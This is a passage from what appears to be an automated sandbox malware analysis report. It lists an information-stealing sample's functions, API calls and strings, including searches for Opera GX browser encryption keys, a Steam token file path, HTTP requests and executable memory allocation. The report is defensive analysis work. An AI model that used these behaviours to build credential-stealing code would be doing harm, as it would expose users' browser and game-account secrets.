Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873

Strings

ERROR, xrefs: 0041686B
ERROR, xrefs: 00416896

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
String ID: ERROR$ERROR
API String ID: 3086566538-2579291623
Opcode ID: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
Instruction ID: fa6cd13a443083575c3a824eeb1e5676c961334a8f4b47820412c2fdc9a040c1
Opcode Fuzzy Hash: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
Instruction Fuzzy Hash: 6F014F75A00118ABCB20FB76D9469CD73A96F04308F55417BBC24E3293E7B8E9494AD9

Function 00416E97 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleSleepThreadWait
String ID:
API String ID: 4198075804-0
Opcode ID: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
Instruction ID: 5b264aedade7dddb2649676fe5ff4aca135c6ea40ecc08e40dc523016e9b5da3
Opcode Fuzzy Hash: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
Instruction Fuzzy Hash: EC213B72900218ABCF14EF96E9459DE7BB9FF40358F11512BF904A3151D738EA86CF98

Function 00412446 Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
WriteFile.KERNEL32(00000000,00000000,00414A8D,00414A8D,00000000,?,?,?,00414A8D), ref: 00412487
CloseHandle.KERNEL32(00000000,?,?,?,00414A8D), ref: 0041249E

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
Instruction ID: a587d297adf89e60fa6946fdd7da6f666782c0f167f87b21f29bcfda1cd19bad
Opcode Fuzzy Hash: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
Instruction Fuzzy Hash: 84F02471200118BFEF01AFA4DD8AFEF379CDF053A8F000022F951D6190D3A58D9157A5

Function 6C513060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C513095

Part of subcall function 6C5135A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C59F688,00001000), ref: 6C5135D5
Part of subcall function 6C5135A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C5135E0
Part of subcall function 6C5135A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C5135FD
Part of subcall function 6C5135A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C51363F
Part of subcall function 6C5135A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C51369F
Part of subcall function 6C5135A0: __aulldiv.LIBCMT ref: 6C5136E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C51309F

Part of subcall function 6C535B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C5356EE,?,00000001), ref: 6C535B85
Part of subcall function 6C535B50: EnterCriticalSection.KERNEL32(6C59F688,?,?,?,6C5356EE,?,00000001), ref: 6C535B90
Part of subcall function 6C535B50: LeaveCriticalSection.KERNEL32(6C59F688,?,?,?,6C5356EE,?,00000001), ref: 6C535BD8
Part of subcall function 6C535B50: GetTickCount64.KERNEL32 ref: 6C535BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C5130BE

Part of subcall function 6C5130F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C513127
Part of subcall function 6C5130F0: __aulldiv.LIBCMT ref: 6C513140

Part of subcall function 6C54AB2A: __onexit.LIBCMT ref: 6C54AB30

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: dd8a5d4409348bd39e114207b5c75f5f55037df3abaaf24287f9420610506c34
Instruction ID: acbaa210dfd50a62b8d1a1e2da962a26e24d541e71e631f6b0bd586a5b50e65e
Opcode Fuzzy Hash: dd8a5d4409348bd39e114207b5c75f5f55037df3abaaf24287f9420610506c34
Instruction Fuzzy Hash: B3F0F932D20784D7CA10DF34CC511E67374EFAB214F536759F84553511FB2066E88389

Function 00410C85 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
Instruction ID: 4a48e0897f6a5e53a67cc5d7e0c14adbc6ce47083a4b6c26751418be0e4428b5
Opcode Fuzzy Hash: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
Instruction Fuzzy Hash: 2DE08CB1200204BBD7449BD9AC8DF8A76BCDB84715F100226F605D6250EAB4C9848B68

Function 0040C95C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

StrCmpCA.SHLWAPI(?,Opera GX,00436853,0043684B,?,?,?), ref: 0040C98F

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Strings

Opera GX, xrefs: 0040C97F

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
String ID: Opera GX
API String ID: 1719890681-3280151751
Opcode ID: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
Instruction ID: 2f838092edd703084741f82f1e37e62fc4a331bb811b3281c0e98dae42c078f1
Opcode Fuzzy Hash: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
Instruction Fuzzy Hash: 3FB1FD7294011DABCF10FFA6DE425CD7775AF04308F51013AF904771A1DBB8AE8A8B99

Function 00407B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A

Strings

, xrefs: 00407B5D

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
Instruction ID: 7cbd0eafb3405f1822ca0081af98c781be9845726f70e814ec0c9ffce599534c
Opcode Fuzzy Hash: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
Instruction Fuzzy Hash: 14119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B

Function 00416FB7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

lstrlenA.KERNEL32(?), ref: 00416FFE

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

Soft\Steam\steam_tokens.txt, xrefs: 0041700E

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 502913869-3507145866
Opcode ID: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
Instruction ID: 5852b7b14dd5e00f67c9332eee82213ee25541dc93f475b49d312086d811fdd4
Opcode Fuzzy Hash: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
Instruction Fuzzy Hash: A5012571E4010967CF00FBE6DD478CD7B74AF04358F514176FA0077152D779AA8A86D5

Function 00411E1F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

Strings

1iA, xrefs: 00411E47

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID: 1iA
API String ID: 3494564517-1863120733
Opcode ID: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
Instruction ID: dc66f3ebc75c526b8f29ca666c763a1a9938aadc44e5483d7dab6bcf02b3e8fe
Opcode Fuzzy Hash: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
Instruction Fuzzy Hash: 08E02B3AA41B201FC7724BAA8804AB7BB5A9FC2F61B18412BDF49CB324D535CC4182E4

Function 004077F8 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
Instruction ID: 58502b0b00c881bab5b754626ee9ce4ad9b10c36d9ff74d45ae59ae86afa5875
Opcode Fuzzy Hash: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
Instruction Fuzzy Hash: C311B472A44705ABC724CFB8C989B9BB7F4EB40714F24483EE54AE7390E274B940C715

Function 0041CBB8 Relevance: 2.5, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041CBC9

Part of subcall function 0041BB6C: lstrlenA.KERNEL32(?,0041CBDA,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BB9E
Part of subcall function 0041BB6C: malloc.MSVCRT ref: 0041BBA6
Part of subcall function 0041BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBB1

malloc.MSVCRT ref: 0041CC06

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc$lstrcpylstrlen
String ID:
API String ID: 2974738957-0
Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
Instruction ID: ee4a01d13f6e4d683757beabffaaf009a5c9ff74aa08d02828624340765fdc95
Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
Instruction Fuzzy Hash: FBF0F0766482119BC7206F66EC8199BBB94EB447A0F054027EE08DB341EA38DC8083E8

Function 004184AE Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
Instruction ID: 897ff34fa84f0db00a67010516d6b662afcd179cf6ab32d5fb27a0f78a31b5bc
Opcode Fuzzy Hash: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
Instruction Fuzzy Hash: 34516031901201BBCE717BEE854AAF6B6D69FA0318B14048FF814AA232DF2D8DC45E5D

Function 00407BD2 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

